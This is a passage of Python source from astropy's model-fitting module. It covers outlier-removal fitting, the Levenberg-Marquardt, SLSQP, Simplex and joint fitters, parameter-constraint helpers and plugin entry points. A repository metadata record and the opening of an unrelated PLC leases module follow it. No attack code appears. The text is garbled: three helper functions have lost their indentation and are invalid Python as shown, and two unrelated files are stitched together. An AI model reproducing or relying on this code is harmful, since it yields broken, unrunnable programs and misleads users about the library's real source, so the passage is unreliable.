        # calculate and set covariance matrix and standard devs. on model
        if self._calc_uncertainties:
            if len(y) > len(lacoef):
                self._add_fitting_uncertainties(model_copy, a*scl,
                                                len(lacoef), x, y, z, resids)
        model_copy.sync_constraints = True
        return model_copy
class FittingWithOutlierRemoval:
    """
    This class combines an outlier removal technique with a fitting procedure.
    Basically, given a maximum number of iterations ``niter``, outliers are
    removed and fitting is performed for each iteration, until no new outliers
    are found or ``niter`` is reached.

    Parameters
    ----------
    fitter : `Fitter`
        An instance of any Astropy fitter, i.e., LinearLSQFitter,
        LevMarLSQFitter, SLSQPLSQFitter, SimplexLSQFitter, JointFitter. For
        model set fitting, this must understand masked input data (as
        indicated by the fitter class attribute ``supports_masked_input``).
    outlier_func : callable
        A function for outlier removal.
        If this accepts an ``axis`` parameter like the `numpy` functions, the
        appropriate value will be supplied automatically when fitting model
        sets (unless overridden in ``outlier_kwargs``), to find outliers for
        each model separately; otherwise, the same filtering must be performed
        in a loop over models, which is almost an order of magnitude slower.
    niter : int, optional
        Maximum number of iterations.
    outlier_kwargs : dict, optional
        Keyword arguments for outlier_func.

    Attributes
    ----------
    fit_info : dict
        The ``fit_info`` (if any) from the last iteration of the wrapped
        ``fitter`` during the most recent fit. An entry is also added with the
        keyword ``niter`` that records the actual number of fitting iterations
        performed (as opposed to the user-specified maximum).
    """

    def __init__(self, fitter, outlier_func, niter=3, **outlier_kwargs):
        self.fitter = fitter
        self.outlier_func = outlier_func
        self.niter = niter
        self.outlier_kwargs = outlier_kwargs
        self.fit_info = {'niter': None}

    def __str__(self):
        return ("Fitter: {0}\nOutlier function: {1}\nNum. of iterations: {2}" +
                ("\nOutlier func. args.: {3}"))\
            .format(self.fitter.__class__.__name__,
                    self.outlier_func.__name__, self.niter,
                    self.outlier_kwargs)

    def __repr__(self):
        return ("{0}(fitter: {1}, outlier_func: {2}," +
                " niter: {3}, outlier_kwargs: {4})")\
            .format(self.__class__.__name__,
                    self.fitter.__class__.__name__,
                    self.outlier_func.__name__, self.niter,
                    self.outlier_kwargs)

    def __call__(self, model, x, y, z=None, weights=None, **kwargs):
        """
        Parameters
        ----------
        model : `~astropy.modeling.FittableModel`
            An analytic model which will be fit to the provided data.
            This also contains the initial guess for an optimization
            algorithm.
        x : array-like
            Input coordinates.
        y : array-like
            Data measurements (1D case) or input coordinates (2D case).
        z : array-like, optional
            Data measurements (2D case).
        weights : array-like, optional
            Weights to be passed to the fitter.
        kwargs : dict, optional
            Keyword arguments to be passed to the fitter.

        Returns
        -------
        fitted_model : `~astropy.modeling.FittableModel`
            Fitted model after outlier removal.
        mask : `numpy.ndarray`
            Boolean mask array, identifying which points were used in the final
            fitting iteration (False) and which were found to be outliers or
            were masked in the input (True).
        """
        # For single models, the data get filtered here at each iteration and
        # then passed to the fitter, which is the historical behavior and
        # works even for fitters that don't understand masked arrays. For model
        # sets, the fitter must be able to filter masked data internally,
        # because fitters require a single set of x/y co-ordinates whereas the
        # eliminated points can vary between models. To avoid this limitation,
        # we could fall back to looping over individual model fits, but it
        # would likely be fiddly and involve even more overhead (and the
        # non-linear fitters don't work with model sets anyway, as of writing).
        if len(model) == 1:
            model_set_axis = None
        else:
            if not hasattr(self.fitter, 'supports_masked_input') or \
                    self.fitter.supports_masked_input is not True:
                raise ValueError("{} cannot fit model sets with masked "
                                 "values".format(type(self.fitter).__name__))

            # Fitters use their input model's model_set_axis to determine how
            # their input data are stacked:
            model_set_axis = model.model_set_axis

        # Construct input co-ordinate tuples for fitters & models that are
        # appropriate for the dimensionality being fitted:
        if z is None:
            coords = (x, )
            data = y
        else:
            coords = x, y
            data = z

        # For model sets, construct a numpy-standard "axis" tuple for the
        # outlier function, to treat each model separately (if supported):
        if model_set_axis is not None:

            if model_set_axis < 0:
                model_set_axis += data.ndim

            if 'axis' not in self.outlier_kwargs:  # allow user override
                # This also works for False (like model instantiation):
                self.outlier_kwargs['axis'] = tuple(
                    n for n in range(data.ndim) if n != model_set_axis
                )

        loop = False

        # Starting fit, prior to any iteration and masking:
        fitted_model = self.fitter(model, x, y, z, weights=weights, **kwargs)
        filtered_data = np.ma.masked_array(data)
        if filtered_data.mask is np.ma.nomask:
            filtered_data.mask = False
        filtered_weights = weights
        last_n_masked = filtered_data.mask.sum()
        n = 0  # (allow recording no. of iterations when 0)

        # Perform the iterative fitting:
        for n in range(1, self.niter + 1):

            # (Re-)evaluate the last model:
            model_vals = fitted_model(*coords, model_set_axis=False)

            # Determine the outliers:
            if not loop:

                # Pass axis parameter if outlier_func accepts it, otherwise
                # prepare for looping over models:
                try:
                    filtered_data = self.outlier_func(
                        filtered_data - model_vals, **self.outlier_kwargs
                    )
                # If this happens to catch an error with a parameter other
                # than axis, the next attempt will fail accordingly:
                except TypeError:
                    if model_set_axis is None:
                        raise
                    else:
                        self.outlier_kwargs.pop('axis', None)
                        loop = True

                        # Construct MaskedArray to hold filtered values:
                        filtered_data = np.ma.masked_array(
                            filtered_data,
                            dtype=np.result_type(filtered_data, model_vals),
                            copy=True
                        )
                        # Make sure the mask is an array, not just nomask:
                        if filtered_data.mask is np.ma.nomask:
                            filtered_data.mask = False

                        # Get views transposed appropriately for iteration
                        # over the set (handling data & mask separately due to
                        # NumPy issue #8506):
                        data_T = np.rollaxis(filtered_data, model_set_axis, 0)
                        mask_T = np.rollaxis(filtered_data.mask,
                                             model_set_axis, 0)

            if loop:
                # Slow path: filter the residuals of each model in the set
                # separately, writing results back through the views above.
                model_vals_T = np.rollaxis(model_vals, model_set_axis, 0)
                for row_data, row_mask, row_mod_vals in zip(data_T, mask_T,
                                                            model_vals_T):
                    masked_residuals = self.outlier_func(
                        row_data - row_mod_vals, **self.outlier_kwargs
                    )
                    row_data.data[:] = masked_residuals.data
                    row_mask[:] = masked_residuals.mask

                # Issue speed warning after the fact, so it only shows up when
                # the TypeError is genuinely due to the axis argument.
                warnings.warn('outlier_func did not accept axis argument; '
                              'reverted to slow loop over models.',
                              AstropyUserWarning)

            # Recombine newly-masked residuals with model to get masked values:
            filtered_data += model_vals

            # Re-fit the data after filtering, passing masked/unmasked values
            # for single models / sets, respectively:
            if model_set_axis is None:
                good = ~filtered_data.mask
                if weights is not None:
                    filtered_weights = weights[good]
                fitted_model = self.fitter(fitted_model,
                                           *(c[good] for c in coords),
                                           filtered_data.data[good],
                                           weights=filtered_weights, **kwargs)
            else:
                fitted_model = self.fitter(fitted_model, *coords,
                                           filtered_data,
                                           weights=filtered_weights, **kwargs)

            # Stop iteration if the masked points are no longer changing (with
            # cumulative rejection we only need to compare how many there are):
            this_n_masked = filtered_data.mask.sum()  # (minimal overhead)
            if this_n_masked == last_n_masked:
                break
            last_n_masked = this_n_masked

        self.fit_info = {'niter': n}
        self.fit_info.update(getattr(self.fitter, 'fit_info', {}))

        return fitted_model, filtered_data.mask
class LevMarLSQFitter(metaclass=_FitterMeta):
    """
    Levenberg-Marquardt algorithm and least squares statistic.

    Attributes
    ----------
    fit_info : dict
        The `scipy.optimize.leastsq` result for the most recent fit (see
        notes).

    Notes
    -----
    The ``fit_info`` dictionary contains the values returned by
    `scipy.optimize.leastsq` for the most recent fit, including the values from
    the ``infodict`` dictionary it returns. See the `scipy.optimize.leastsq`
    documentation for details on the meaning of these values. Note that the
    ``x`` return value is *not* included (as it is instead the parameter values
    of the returned model).

    Additionally, one additional element of ``fit_info`` is computed whenever a
    model is fit, with the key 'param_cov'. The corresponding value is the
    covariance matrix of the parameters as a 2D numpy array. The order of the
    matrix elements matches the order of the parameters in the fitted model
    (i.e., the same order as ``model.param_names``).
    """
    supported_constraints = ['fixed', 'tied', 'bounds']
    """
    The constraint types supported by this fitter type.
    """
    def __init__(self, calc_uncertainties=False):
        # Reset on every call; keys mirror scipy.optimize.leastsq's
        # full_output return values (see class docstring).
        self.fit_info = {'nfev': None,
                         'fvec': None,
                         'fjac': None,
                         'ipvt': None,
                         'qtf': None,
                         'message': None,
                         'ierr': None,
                         'param_jac': None,
                         'param_cov': None}
        # When True, attach covariance/std-dev attributes to fitted models.
        self._calc_uncertainties=calc_uncertainties
        super().__init__()
    def objective_function(self, fps, *args):
        """
        Function to minimize.

        Parameters
        ----------
        fps : list
            parameters returned by the fitter
        args : list
            [model, [weights], [input coordinates]]

        Returns
        -------
        ndarray
            The (optionally weighted) residuals, raveled to 1-D.
        """
        model = args[0]
        weights = args[1]
        # Push the fitter's free-parameter vector into the model, honoring
        # any fixed/tied/bounds constraints.
        _fitter_to_model_params(model, fps)
        # The measured data is always the last positional argument; the
        # coordinates are everything between weights and the data.
        meas = args[-1]
        if weights is None:
            return np.ravel(model(*args[2: -1]) - meas)
        else:
            return np.ravel(weights * (model(*args[2: -1]) - meas))
    @staticmethod
    def _add_fitting_uncertainties(model, cov_matrix):
        """
        Set ``cov_matrix`` and ``stds`` attributes on model with parameter
        covariance matrix returned by ``optimize.leastsq``.
        """
        # Only free parameters (neither fixed nor tied) appear in the
        # covariance matrix, in model.fixed (param_names) order.
        free_param_names = [x for x in model.fixed if (model.fixed[x] is False)
                            and (model.tied[x] is False)]
        model.cov_matrix = Covariance(cov_matrix, free_param_names)
        model.stds = StandardDeviations(cov_matrix, free_param_names)
    @fitter_unit_support
    def __call__(self, model, x, y, z=None, weights=None,
                 maxiter=DEFAULT_MAXITER, acc=DEFAULT_ACC,
                 epsilon=DEFAULT_EPS, estimate_jacobian=False):
        """
        Fit data to this model.

        Parameters
        ----------
        model : `~astropy.modeling.FittableModel`
            model to fit to x, y, z
        x : array
            input coordinates
        y : array
            input coordinates
        z : array, optional
            input coordinates
        weights : array, optional
            Weights for fitting.
            For data with Gaussian uncertainties, the weights should be
            1/sigma.
        maxiter : int
            maximum number of iterations
        acc : float
            Relative error desired in the approximate solution
        epsilon : float
            A suitable step length for the forward-difference
            approximation of the Jacobian (if model.fjac=None). If
            epsfcn is less than the machine precision, it is
            assumed that the relative errors in the functions are
            of the order of the machine precision.
        estimate_jacobian : bool
            If False (default) and if the model has a fit_deriv method,
            it will be used. Otherwise the Jacobian will be estimated.
            If True, the Jacobian will be estimated in any case.
        equivalencies : list or None, optional, keyword-only
            List of *additional* equivalencies that should be applied in
            case x, y and/or z have units. Default is None.

        Returns
        -------
        model_copy : `~astropy.modeling.FittableModel`
            a copy of the input model with parameters set by the fitter
        """
        from scipy import optimize
        model_copy = _validate_model(model, self.supported_constraints)
        # Defer constraint syncing until the fit loop is done (avoids
        # re-evaluating tied expressions on every parameter update).
        model_copy.sync_constraints = False
        farg = (model_copy, weights, ) + _convert_input(x, y, z)
        if model_copy.fit_deriv is None or estimate_jacobian:
            # No analytic derivatives: let leastsq forward-difference.
            dfunc = None
        else:
            # Analytic derivatives, wrapped to drop fixed/tied parameters.
            dfunc = self._wrap_deriv
        init_values, _ = _model_to_fit_params(model_copy)
        fitparams, cov_x, dinfo, mess, ierr = optimize.leastsq(
            self.objective_function, init_values, args=farg, Dfun=dfunc,
            col_deriv=model_copy.col_fit_deriv, maxfev=maxiter, epsfcn=epsilon,
            xtol=acc, full_output=True)
        _fitter_to_model_params(model_copy, fitparams)
        self.fit_info.update(dinfo)
        self.fit_info['cov_x'] = cov_x
        self.fit_info['message'] = mess
        self.fit_info['ierr'] = ierr
        # leastsq signals success only through ierr codes 1-4.
        if ierr not in [1, 2, 3, 4]:
            warnings.warn("The fit may be unsuccessful; check "
                          "fit_info['message'] for more information.",
                          AstropyUserWarning)
        # now try to compute the true covariance matrix
        if (len(y) > len(init_values)) and cov_x is not None:
            # Scale the fractional covariance from leastsq by the reduced
            # chi-squared (sum of squared residuals / degrees of freedom).
            sum_sqrs = np.sum(self.objective_function(fitparams, *farg)**2)
            dof = len(y) - len(init_values)
            self.fit_info['param_cov'] = cov_x * sum_sqrs / dof
        else:
            self.fit_info['param_cov'] = None
        if self._calc_uncertainties is True:
            if self.fit_info['param_cov'] is not None:
                self._add_fitting_uncertainties(model_copy,
                                                self.fit_info['param_cov'])
        model_copy.sync_constraints = True
        return model_copy
    @staticmethod
    def _wrap_deriv(params, model, weights, x, y, z=None):
        """
        Wraps the method calculating the Jacobian of the function to account
        for model constraints.

        `scipy.optimize.leastsq` expects the function derivative to have the
        above signature (parlist, (argtuple)). In order to accommodate model
        constraints, instead of using p directly, we set the parameter list in
        this function.
        """
        if weights is None:
            weights = 1.0
        if any(model.fixed.values()) or any(model.tied.values()):
            # update the parameters with the current values from the fitter
            _fitter_to_model_params(model, params)
            if z is None:
                full = np.array(model.fit_deriv(x, *model.parameters))
                if not model.col_fit_deriv:
                    full_deriv = np.ravel(weights) * full.T
                else:
                    full_deriv = np.ravel(weights) * full
            else:
                full = np.array([np.ravel(_) for _ in model.fit_deriv(x, y, *model.parameters)])
                if not model.col_fit_deriv:
                    full_deriv = np.ravel(weights) * full.T
                else:
                    full_deriv = np.ravel(weights) * full
            pars = [getattr(model, name) for name in model.param_names]
            fixed = [par.fixed for par in pars]
            tied = [par.tied for par in pars]
            # Callable ``tied`` entries must also be treated as tied.
            tied = list(np.where([par.tied is not False for par in pars],
                                 True, tied))
            fix_and_tie = np.logical_or(fixed, tied)
            ind = np.logical_not(fix_and_tie)
            # Keep only the Jacobian rows/columns of the free parameters.
            if not model.col_fit_deriv:
                residues = np.asarray(full_deriv[np.nonzero(ind)]).T
            else:
                residues = full_deriv[np.nonzero(ind)]
            return [np.ravel(_) for _ in residues]
        else:
            if z is None:
                try:
                    return np.array([np.ravel(_) for _ in np.array(weights) *
                                     np.array(model.fit_deriv(x, *params))])
                except ValueError:
                    # Broadcasting failed; move the last axis to the front so
                    # the weights broadcast against the derivative array.
                    return np.array([np.ravel(_) for _ in np.array(weights) *
                                     np.moveaxis(
                                         np.array(model.fit_deriv(x, *params)),
                                         -1, 0)]).transpose()
            else:
                if not model.col_fit_deriv:
                    return [np.ravel(_) for _ in
                            (np.ravel(weights) * np.array(model.fit_deriv(x, y, *params)).T).T]
                return [np.ravel(_) for _ in weights * np.array(model.fit_deriv(x, y, *params))]
class SLSQPLSQFitter(Fitter):
    """
    Least-squares fitting via the Sequential Least Squares Programming
    (SLSQP) optimization algorithm.

    Raises
    ------
    ModelLinearityError
        A linear model is passed to a nonlinear fitter

    Notes
    -----
    See also the `~astropy.modeling.optimizers.SLSQP` optimizer.
    """

    supported_constraints = SLSQP.supported_constraints

    def __init__(self):
        super().__init__(optimizer=SLSQP, statistic=leastsquare)
        self.fit_info = {}

    @fitter_unit_support
    def __call__(self, model, x, y, z=None, weights=None, **kwargs):
        """
        Fit data to this model.

        Parameters
        ----------
        model : `~astropy.modeling.FittableModel`
            model to fit to x, y, z
        x : array
            input coordinates
        y : array
            input coordinates
        z : array, optional
            input coordinates
        weights : array, optional
            Weights for fitting. For data with Gaussian uncertainties the
            weights should be 1/sigma.
        kwargs : dict
            optional keyword arguments passed on to the optimizer or the
            statistic; recognized keys include ``verblevel`` (0 silent,
            1 summary on completion, 2 summary per iteration), ``maxiter``
            (maximum number of iterations), ``epsilon`` (finite-difference
            step size) and ``acc`` (requested accuracy)
        equivalencies : list or None, optional, keyword-only
            List of *additional* equivalencies that should be applied in
            case x, y and/or z have units. Default is None.

        Returns
        -------
        model_copy : `~astropy.modeling.FittableModel`
            a copy of the input model with parameters set by the fitter
        """
        model_copy = _validate_model(model, self._opt_method.supported_constraints)
        model_copy.sync_constraints = False
        # Optimizer arguments: (model, weights, coordinates..., data).
        fit_args = (model_copy, weights) + _convert_input(x, y, z)
        initial_guess, _ = _model_to_fit_params(model_copy)
        fitted_params, self.fit_info = self._opt_method(
            self.objective_function, initial_guess, fit_args, **kwargs)
        _fitter_to_model_params(model_copy, fitted_params)
        model_copy.sync_constraints = True
        return model_copy
class SimplexLSQFitter(Fitter):
    """
    Least-squares fitting using the downhill simplex algorithm.

    Raises
    ------
    `ModelLinearityError`
        A linear model is passed to a nonlinear fitter
    """

    supported_constraints = Simplex.supported_constraints

    def __init__(self):
        super().__init__(optimizer=Simplex, statistic=leastsquare)
        self.fit_info = {}

    @fitter_unit_support
    def __call__(self, model, x, y, z=None, weights=None, **kwargs):
        """
        Fit data to this model.

        Parameters
        ----------
        model : `~astropy.modeling.FittableModel`
            model to fit to x, y, z
        x : array
            input coordinates
        y : array
            input coordinates
        z : array, optional
            input coordinates
        weights : array, optional
            Weights for fitting. For data with Gaussian uncertainties the
            weights should be 1/sigma.
        kwargs : dict
            optional keyword arguments passed on to the optimizer or the
            statistic; recognized keys include ``maxiter`` (maximum number
            of iterations) and ``acc`` (relative error in the approximate
            solution)
        equivalencies : list or None, optional, keyword-only
            List of *additional* equivalencies that should be applied in
            case x, y and/or z have units. Default is None.

        Returns
        -------
        model_copy : `~astropy.modeling.FittableModel`
            a copy of the input model with parameters set by the fitter
        """
        model_copy = _validate_model(model,
                                     self._opt_method.supported_constraints)
        model_copy.sync_constraints = False
        # Optimizer arguments: (model, weights, coordinates..., data).
        fit_args = (model_copy, weights) + _convert_input(x, y, z)
        initial_guess, _ = _model_to_fit_params(model_copy)
        fitted_params, self.fit_info = self._opt_method(
            self.objective_function, initial_guess, fit_args, **kwargs)
        _fitter_to_model_params(model_copy, fitted_params)
        model_copy.sync_constraints = True
        return model_copy
class JointFitter(metaclass=_FitterMeta):
    """
    Fit models which share a parameter.

    For example, fit two gaussians to two data sets but keep
    the FWHM the same.

    Parameters
    ----------
    models : list
        a list of model instances
    jointparameters : list
        a list of joint parameters
    initvals : list
        a list of initial values
    """
    def __init__(self, models, jointparameters, initvals):
        self.models = list(models)
        # Initial values for the joint (shared) parameters.
        self.initvals = list(initvals)
        # Mapping of model -> names of its parameters shared with others.
        self.jointparams = jointparameters
        self._verify_input()
        self.fitparams = self._model_to_fit_params()
        # a list of model.n_inputs
        self.modeldims = [m.n_inputs for m in self.models]
        # sum all model dimensions
        self.ndim = np.sum(self.modeldims)
    def _model_to_fit_params(self):
        """
        Build the flat fit-parameter list: joint parameter values first,
        followed by each model's non-joint parameters in model order.
        """
        fparams = []
        fparams.extend(self.initvals)
        for model in self.models:
            params = model.parameters.tolist()
            joint_params = self.jointparams[model]
            param_metrics = model._param_metrics
            # Strip the joint parameters; they are already at the front.
            for param_name in joint_params:
                slice_ = param_metrics[param_name]['slice']
                del params[slice_]
            fparams.extend(params)
        return fparams
    def objective_function(self, fps, *args):
        """
        Function to minimize.

        Parameters
        ----------
        fps : list
            the fitted parameters - result of an one iteration of the
            fitting algorithm
        args : dict
            tuple of measured and input coordinates
            args is always passed as a tuple from optimize.leastsq

        Returns
        -------
        ndarray
            Raveled residuals of all models, concatenated.
        """
        lstsqargs = list(args)
        fitted = []
        fitparams = list(fps)
        numjp = len(self.initvals)
        # make a separate list of the joint fitted parameters
        jointfitparams = fitparams[:numjp]
        del fitparams[:numjp]
        for model in self.models:
            joint_params = self.jointparams[model]
            # Consume this model's n_inputs coordinate arrays plus its
            # measured data array from the argument list.
            margs = lstsqargs[:model.n_inputs + 1]
            del lstsqargs[:model.n_inputs + 1]
            # separate each model separately fitted parameters
            numfp = len(model._parameters) - len(joint_params)
            mfparams = fitparams[:numfp]
            del fitparams[:numfp]
            # recreate the model parameters
            mparams = []
            param_metrics = model._param_metrics
            for param_name in model.param_names:
                if param_name in joint_params:
                    index = joint_params.index(param_name)
                    # should do this with slices in case the
                    # parameter is not a number
                    mparams.extend([jointfitparams[index]])
                else:
                    slice_ = param_metrics[param_name]['slice']
                    plen = slice_.stop - slice_.start
                    mparams.extend(mfparams[:plen])
                    del mfparams[:plen]
            modelfit = model.evaluate(margs[:-1], *mparams)
            # Residual against the measured data (last element of margs).
            fitted.extend(modelfit - margs[-1])
        return np.ravel(fitted)
    def _verify_input(self):
        """Sanity-check the models/joint-parameters/initial-values triple."""
        if len(self.models) <= 1:
            raise TypeError(f"Expected >1 models, {len(self.models)} is given")
        if len(self.jointparams.keys()) < 2:
            raise TypeError("At least two parameters are expected, "
                            "{} is given".format(len(self.jointparams.keys())))
        for j in self.jointparams.keys():
            if len(self.jointparams[j]) != len(self.initvals):
                raise TypeError("{} parameter(s) provided but {} expected".format(
                    len(self.jointparams[j]), len(self.initvals)))
    def __call__(self, *args):
        """
        Fit data to these models keeping some of the parameters common to the
        two models.
        """
        from scipy import optimize
        # Each model contributes n_inputs coordinate arrays plus one data
        # array, hence the x + 1 + y + 1 reduction over modeldims.
        if len(args) != reduce(lambda x, y: x + 1 + y + 1, self.modeldims):
            raise ValueError("Expected {} coordinates in args but {} provided"
                             .format(reduce(lambda x, y: x + 1 + y + 1,
                                            self.modeldims), len(args)))
        self.fitparams[:], _ = optimize.leastsq(self.objective_function,
                                                self.fitparams, args=args)
        fparams = self.fitparams[:]
        numjp = len(self.initvals)
        # make a separate list of the joint fitted parameters
        jointfitparams = fparams[:numjp]
        del fparams[:numjp]
        for model in self.models:
            # extract each model's fitted parameters
            joint_params = self.jointparams[model]
            numfp = len(model._parameters) - len(joint_params)
            mfparams = fparams[:numfp]
            del fparams[:numfp]
            # recreate the model parameters
            mparams = []
            param_metrics = model._param_metrics
            for param_name in model.param_names:
                if param_name in joint_params:
                    index = joint_params.index(param_name)
                    # should do this with slices in case the parameter
                    # is not a number
                    mparams.extend([jointfitparams[index]])
                else:
                    slice_ = param_metrics[param_name]['slice']
                    plen = slice_.stop - slice_.start
                    mparams.extend(mfparams[:plen])
                    del mfparams[:plen]
            model.parameters = np.array(mparams)
def _convert_input(x, y, z=None, n_models=1, model_set_axis=0):
"""Convert inputs to float arrays."""
x = np.asanyarray(x, dtype=float)
y = np.asanyarray(y, dtype=float)
if z is not None:
z = np.asanyarray(z, dtype=float)
data_ndim, data_shape = z.ndim, z.shape
else:
data_ndim, data_shape = y.ndim, y.shape
# For compatibility with how the linear fitter code currently expects to
# work, shift the dependent variable's axes to the expected locations
if n_models > 1 or data_ndim > x.ndim:
if (model_set_axis or 0) >= data_ndim:
raise ValueError("model_set_axis out of range")
if data_shape[model_set_axis] != n_models:
raise ValueError(
"Number of data sets (y or z array) is expected to equal "
"the number of parameter sets"
)
if z is None:
# For a 1-D model the y coordinate's model-set-axis is expected to
# be last, so that its first dimension is the same length as the x
# coordinates. This is in line with the expectations of
# numpy.linalg.lstsq:
# https://numpy.org/doc/stable/reference/generated/numpy.linalg.lstsq.html
# That is, each model should be represented by a column. TODO:
# Obviously this is a detail of np.linalg.lstsq and should be
# handled specifically by any fitters that use it...
y = np.rollaxis(y, model_set_axis, y.ndim)
data_shape = y.shape[:-1]
else:
# Shape of z excluding model_set_axis
data_shape = (z.shape[:model_set_axis] +
z.shape[model_set_axis + 1:])
if z is None:
if data_shape != x.shape:
raise ValueError("x and y should have the same shape")
farg = (x, y)
else:
if not (x.shape == y.shape == data_shape):
raise ValueError("x, y and z should have the same shape")
farg = (x, y, z)
return farg
# TODO: These utility functions are really particular to handling
# bounds/tied/fixed constraints for scipy.optimize optimizers that do not
# support them inherently; this needs to be reworked to be clear about this
# distinction (and the fact that these are not necessarily applicable to any
# arbitrary fitter--as evidenced for example by the fact that JointFitter has
# its own versions of these)
# TODO: Most of this code should be entirely rewritten; it should not be as
# inefficient as it is.
def _fitter_to_model_params(model, fps):
    """
    Constructs the full list of model parameters from the fitted and
    constrained parameters.

    ``fps`` holds values only for the free (non-fixed, non-tied)
    parameters; fixed values are preserved, tied values are recomputed
    from their expressions, and bounded values are clipped into range.
    """
    _, fit_param_indices = _model_to_fit_params(model)
    has_tied = any(model.tied.values())
    has_fixed = any(model.fixed.values())
    has_bound = any(b != (None, None) for b in model.bounds.values())
    parameters = model.parameters
    if not (has_tied or has_fixed or has_bound):
        # We can just assign directly
        model.parameters = fps
        return
    fit_param_indices = set(fit_param_indices)
    offset = 0
    param_metrics = model._param_metrics
    for idx, name in enumerate(model.param_names):
        # Skip fixed/tied parameters; they consume no slots in fps.
        if idx not in fit_param_indices:
            continue
        slice_ = param_metrics[name]['slice']
        shape = param_metrics[name]['shape']
        # This is determining which range of fps (the fitted parameters) maps
        # to parameters of the model
        size = reduce(operator.mul, shape, 1)
        values = fps[offset:offset + size]
        # Check bounds constraints
        if model.bounds[name] != (None, None):
            _min, _max = model.bounds[name]
            # fmax/fmin clip element-wise while ignoring NaN bounds.
            if _min is not None:
                values = np.fmax(values, _min)
            if _max is not None:
                values = np.fmin(values, _max)
        parameters[slice_] = values
        offset += size
    # Update model parameters before calling ``tied`` constraints.
    model._array_to_parameters()
    # This has to be done in a separate loop due to how tied parameters are
    # currently evaluated (the fitted parameters need to actually be *set* on
    # the model first, for use in evaluating the "tied" expression--it might be
    # better to change this at some point
    if has_tied:
        for idx, name in enumerate(model.param_names):
            if model.tied[name]:
                value = model.tied[name](model)
                slice_ = param_metrics[name]['slice']
                # To handle multiple tied constraints, model parameters
                # need to be updated after each iteration.
                parameters[slice_] = value
                model._array_to_parameters()
def _model_to_fit_params(model):
"""
Convert a model instance's parameter array to an array that can be used
with a fitter that doesn't natively support fixed or tied parameters.
In particular, it removes fixed/tied parameters from the parameter
array.
These may be a subset of the model parameters, if some of them are held
constant or tied.
"""
fitparam_indices = list(range(len(model.param_names)))
if any(model.fixed.values()) or any(model.tied.values()):
params = list(model.parameters)
param_metrics = model._param_metrics
for idx, name in list(enumerate(model.param_names))[::-1]:
if model.fixed[name] or model.tied[name]:
slice_ = param_metrics[name]['slice']
del params[slice_]
del fitparam_indices[idx]
return (np.array(params), fitparam_indices)
return (model.parameters, fitparam_indices)
def _validate_constraints(supported_constraints, model):
"""Make sure model constraints are supported by the current fitter."""
message = 'Optimizer cannot handle {0} constraints.'
if (any(model.fixed.values()) and
'fixed' not in supported_constraints):
raise UnsupportedConstraintError(
message.format('fixed parameter'))
if any(model.tied.values()) and 'tied' not in supported_constraints:
raise UnsupportedConstraintError(
message.format('tied parameter'))
if (any(tuple(b) != (None, None) for b in model.bounds.values()) and
'bounds' not in supported_constraints):
raise UnsupportedConstraintError(
message.format('bound parameter'))
if model.eqcons and 'eqcons' not in supported_constraints:
raise UnsupportedConstraintError(message.format('equality'))
if model.ineqcons and 'ineqcons' not in supported_constraints:
raise UnsupportedConstraintError(message.format('inequality'))
def _validate_model(model, supported_constraints):
    """
    Check that model and fitter are compatible and return a copy of the model.
    """
    if not model.fittable:
        raise ValueError("Model does not appear to be fittable.")
    if model.linear:
        warnings.warn('Model is linear in parameters; '
                      'consider using linear fitting methods.',
                      AstropyUserWarning)
    elif len(model) != 1:
        # Nonlinear fitters currently handle only a single data set.
        raise ValueError("Non-linear fitters can only fit "
                         "one data set at a time.")
    _validate_constraints(supported_constraints, model)
    # Fit a copy so the caller's model is left untouched.
    return model.copy()
def populate_entry_points(entry_points):
    """
    Inject entry points into the `astropy.modeling.fitting` namespace.

    This provides a means of inserting a fitting routine without requiring
    it to be merged into astropy's core.

    Parameters
    ----------
    entry_points : list of `~importlib.metadata.EntryPoint`
        entry_points are objects which encapsulate importable objects and
        are defined on the installation of a package.

    Notes
    -----
    An explanation of entry points can be found `here <http://setuptools.readthedocs.io/en/latest/setuptools.html#dynamic-discovery-of-services-and-plugins>`
    """
    for entry_point in entry_points:
        name = entry_point.name
        try:
            loaded = entry_point.load()
        except Exception as e:
            # A broken entry point must not break fitting altogether.
            warnings.warn(AstropyUserWarning(
                f'{type(e).__name__} error occurred in entry point {name}.'))
            continue
        if not inspect.isclass(loaded):
            warnings.warn(AstropyUserWarning(
                f'Modeling entry point {name} expected to be a Class.'))
            continue
        if not issubclass(loaded, Fitter):
            warnings.warn(AstropyUserWarning(
                'Modeling entry point {} expected to extend '
                'astropy.modeling.Fitter' .format(name)))
            continue
        # Expose the fitter class in this module's namespace and public API.
        name = loaded.__name__
        globals()[name] = loaded
        __all__.append(name)
def _populate_ep():
    # TODO: use entry_points(group=...) exclusively once Python >= 3.10.
    ep = entry_points()
    if hasattr(ep, 'select'):
        group = ep.select(group='astropy.modeling')
    else:
        group = ep.get('astropy.modeling', [])
    populate_entry_points(group)


_populate_ep()
| {
"content_hash": "8ee6f9c892143cef47acbc0315c39ce5",
"timestamp": "",
"source": "github",
"line_count": 1778,
"max_line_length": 157,
"avg_line_length": 40.16029246344207,
"alnum_prop": 0.5630558084167775,
"repo_name": "aleksandr-bakanov/astropy",
"id": "72820abe73ed43069b0142c3b5ea5c00dced6f34",
"size": "71470",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "astropy/modeling/fitting.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "444651"
},
{
"name": "C++",
"bytes": "1057"
},
{
"name": "HTML",
"bytes": "1172"
},
{
"name": "Objective-C",
"bytes": "615"
},
{
"name": "Python",
"bytes": "9898093"
},
{
"name": "TeX",
"bytes": "853"
}
],
"symlink_target": ""
} |
from datetime import datetime
from PLC.Faults import *
from PLC.Parameter import Parameter, Mixed
from PLC.Filter import Filter
from PLC.Table import Row, Table
from PLC.Nodes import Node, Nodes
from PLC.Slices import Slice, Slices
from PLC.LeaseFilter import LeaseFilter
from PLC.Timestamp import Timestamp
class Lease(Row):
    """
    Representation of a row in the leases table. To use, optionally
    instantiate with a dict of values. Update as you would a
    dict. Commit to the database with sync().
    """
    table_name = 'leases'
    primary_key = 'lease_id'
    # No dependent join rows to clean up when a lease is deleted.
    join_tables = [ ]
    fields = {
        # native
        'lease_id': Parameter(int, "Lease identifier"),
        't_from': Timestamp.Parameter("timeslot start"),
        't_until': Timestamp.Parameter("timeslot end"),
        'node_id': Node.fields['node_id'],
        'slice_id': Slice.fields['slice_id'],
        # derived
        'hostname': Node.fields['hostname'],
        'node_type': Node.fields['node_type'],
        'name': Slice.fields['name'],
        'site_id': Slice.fields['site_id'],
        'duration': Parameter(int, "duration in seconds"),
        'expired' : Parameter(bool, "time slot is over"),
        }
    related_fields = { }
    def validate_time (self, timestamp, round_up):
        """
